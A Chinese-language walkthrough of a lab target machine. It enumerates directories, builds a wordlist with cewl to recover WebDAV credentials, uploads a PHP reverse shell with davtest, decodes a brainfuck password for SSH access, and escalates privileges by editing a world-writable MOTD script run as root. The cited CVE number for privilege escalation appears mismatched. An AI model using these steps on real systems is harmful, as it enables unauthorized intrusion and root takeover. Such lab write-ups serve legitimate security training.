目录


在源码注释中没有发现接口,源码泄露,隐藏目录等
也没有robots.txt,readme.txt文件。
也没有一些文件包含,sql注入,xss等常见漏洞
其他跳转页面也没有能够帮助我们打点成功的信息
401表示目录存在,但是需要验证
403表示目录或文件存在,但是拒绝请求资源,因为服务器配置
404 not found 就是没有。

dirsearch -u http://192.168.29.135 -f -e html,txt,php -w /usr/share/wordlists/dirb/common.txt

这里有个tips.txt,但是这个信息没有用

webdav作用:
是基于http1.1的一种通信协议,类似于ftp的一种协议,可以上传下载文件。这就是我们的突破点,尝试admin/admin guest/guest root/root等常见弱口令。并不成功。只能去爆破了,但是连用户名都不知道,这个爆破起来难度太大了。所以尝试定制字典进行攻击

工作原理:通过爬虫爬取对应URL上的各种资源,通过分析组合,生成一个字典。
cewl http://192.168.29.135/ > dict.txt
或者
cewl http://192.168.29.135/ -w dict.txt
yamdoot@Swarg

成功登录

davtest -auth yamdoot:Swarg -url http://192.168.29.135/webdav
哪些可以上传,哪些可以执行的,一清二楚
这里靶机存在php运行环境

我们用的就是kali有的一个php反弹shell
davtest -auth yamdoot:Swarg -uploadfile php-reverse-shell.php -uploadloc exp.php -url http://192.168.29.135/webdav


通过CVE-2021-3479来提权。
靶机没有gcc编译工具,本地编译后上传执行。

查找一下属主为root,权限属主和属组可执行,其他可以写的文件,找到一个hell.sh文件,查看内容发现是一段BF语言的文字
find / -user root -type f -perm -ug=x,o=w -exec ls -al {} \; 2>/dev/null

全称是brainfuck
这个网站去执行一下这个语言,得到一串字符:chitragupt,作为密码尝试去拿到一个正常用户的权限,ssh到了inferno这个用户
tio.run/#brainfuck

第一个flag.txt

有一个00-header文件,而且是一个shell脚本


motd 英文全称:message of the day 中文解释:每日提示,功能就是当我们登录时,来执行motd文件,达到提示目的。这里我们其他人也有修改权限,而且属主是root,可以用来提权。
在末尾加入shell语句

